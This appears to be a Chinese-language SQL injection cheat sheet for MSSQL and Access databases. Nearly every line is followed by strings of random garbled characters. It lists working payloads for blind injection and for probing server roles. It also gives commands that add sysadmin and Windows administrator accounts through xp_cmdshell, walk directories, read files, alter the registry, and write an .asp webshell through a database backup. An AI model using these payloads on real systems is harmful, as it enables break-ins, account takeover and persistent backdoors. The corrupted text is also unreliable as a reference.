1.判断是否有注入;and 1=1 ;and 1=2 �rHge~�nY<
2.初步判断是否是mssql ;and user>0 A�I vXb\wL
`A$!]�&[~|
3.注入参数是字符'and [查询条件] and ''=' 6DT��TV�66
M,5j5�<�7�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' d$ACDX��2�
�g1E�~+@�
5.判断数据库系统 *.-.iY.a]
1F8 W9b^D�
;and (select count(*) from sysobjects)>0 mssql 1F'1�>Bu~�
WO5O�?jo'�
;and (select count(*) from msysobjects)>0 access b3-e�R5U�/
OI1u�d/>h
�#e��Z6)i<
TcTM]i��xr
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �q#A�(�gyy
l�ASL8O�&\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 8�M�*PML4r
�WF&[HKOy/
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �^��e�fb
5
thi1k�J�`L
9.(1)猜字段的ascii值(access) _m�vxs��G
b+-��f.!j�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �XKA�&XpF�
5vAf7��\�*
(2)猜字段的ascii值(mssql) WL,&-*JAW�
�rB~W �Iu�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �>KLtY|o�)
AUVgPXO�wd
10.测试权限结构(mssql) lE8&..~l$+
qW:)�!z3\�
G�|w�=e�z
k��e�W~ NM
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- PP�~rn� fE
�ZoB�*0H�-
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 9�/�/�+B�h
W�%2
80\h�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- v0D��q�@Q1
&c(WE
RW?-
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- /iNa�'W5\�
�>SN|?|2U/
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 9E�t�z:?)b
Pj�T=$���]
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- .roqEas�u8
H7U�li]e3�
;and 1=(select IS_MEMBER('db_owner'));-- p^nL&yIW,%
)�3�YtIH�_
OdWou�|Gz�
�xqXDxJlns
11.添加mssql和系统的帐户 SVlua@]ChU
Ok�7t�@l$�
;exec master.dbo.sp_addlogin username;-- Z@�8v��L��
;exec master.dbo.sp_password null,username,password;-- o@]S�o�(9f
o*x*jn�:hm
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 2$_9�cF Wm
^�,�F�;M`[
;exec master.dbo.xp_cmdshell 'net user username password ��6$a$K,dZ
b� `2|I� {
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ;4M><OS!��
9=w�|)p )�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- +��uWDP�.
RCTQ�hTy�=
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- v�%k�9M�{�
N"�/-0�(9[
�TSA�U?r\P
^=n+T�7�"J
12.(1)遍历目录 ""�Zp�:8o
^J��Z^>E~�
;create table dirs(paths varchar(100), id int) 50TA�:���7
~U(,TjJ�b�
;insert dirs exec master.dbo.xp_dirtree 'c:\' ��{e|*01hE
uPYmHA}�_/
;and (select top 1 paths from dirs)>0 �gj\�)CBOv
+�_v$!@L8�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ��W"{v2x�i
�4k�/V�BZB
E3�@QI?n^^
{�mWui9 %M
(2)遍历目录 }>^Q'BW;65
*19ax&|*S�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- R(P�%Csbqh
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �-yGD�h+-
�,*�4�p?|A
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 {GvT�fZ�fp
V._6=�Z��J
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 X1IeS��MAe
��Eh-�n��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 +,o0-L��1D
�A*.��/,KT
YY?a>�j."a
x}U8zt)yD3
13.mssql中的存储过程 ze_{=�Cv&Y
j-CnT)W<�
xp_regenumvalues 注册表根键, 子键 �Ngr/QL]�Q
VI�P7�OHJh
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 *Ype>�x{�
@)kO=E� d
xp_regread 根键,子键,键值名 D�jU9
uZT�
h��lu:=<�B
;exec xp_regread ,��+qVu,��
22kp�l)vbU
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 WwC 5�!kZ�
2([2Pb3�<"
xp_regwrite 根键,子键, 值名, 值类型, 值 &U�+ _ -Ph
c���PgfTT
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��7�r|(}�S
Q�0Nyq�hvi
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Zc�uA6#3�B
\����MxoZ�
xp_regdeletevalue 根键,子键,值名 QKN<+,h!z>
H$�af�/^�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 =#�m�TfJ �
k�Ov�Dl!^
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �
��tv�XW
6"c1;P!4 �
'Dvv?�>�=&
pLM�Rwg�zr
14.mssql的backup创建webshell :R�s^0F8)c
AtR?�J"3E
use model <��I���}2k
�t}v2$<!�I
create table cmd(str image); i"�|�$(��2
�bs�9aE<�j
insert into cmd(str) values (''); X7,���P�EA
�T&86A\D\z
backup database model to disk='c:\l.asp'; "x@=��'>:$
�X�2tk[Kr
|�uW�:r1�7
�L�< zD<M�
15.mssql内置函数 BmH�w�u{n'
tO��_H!�kP
;and (select @@version)>0 获得Windows的版本号 �+(�uYwdcN
�F�}"]�9�2
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 2F%W8Y��3�
LZ�@|9!KDw
;and (select user_name())>0 爆当前系统的连接用户 &z�"krM�]G
b':�|�uu*/
;and (select db_name())>0 得到当前连接的数据库 �}F�+zs*S�
C��f B.ZT�
�9�h/>QL�x
�7PR#(ftz
16.简洁的webshell B?�$ "\�;&
�9N%JP+<89
use model H
_Va"yTO6
�n��hG
J�
create table cmd(str image); FWH}j0�Gj|
j3q~E[Mz\�
insert into cmd(str) values (''); mDh1>�>K'~
rF\�"w0J�_
backup database model to disk='g:\wwwtest\l.asp';
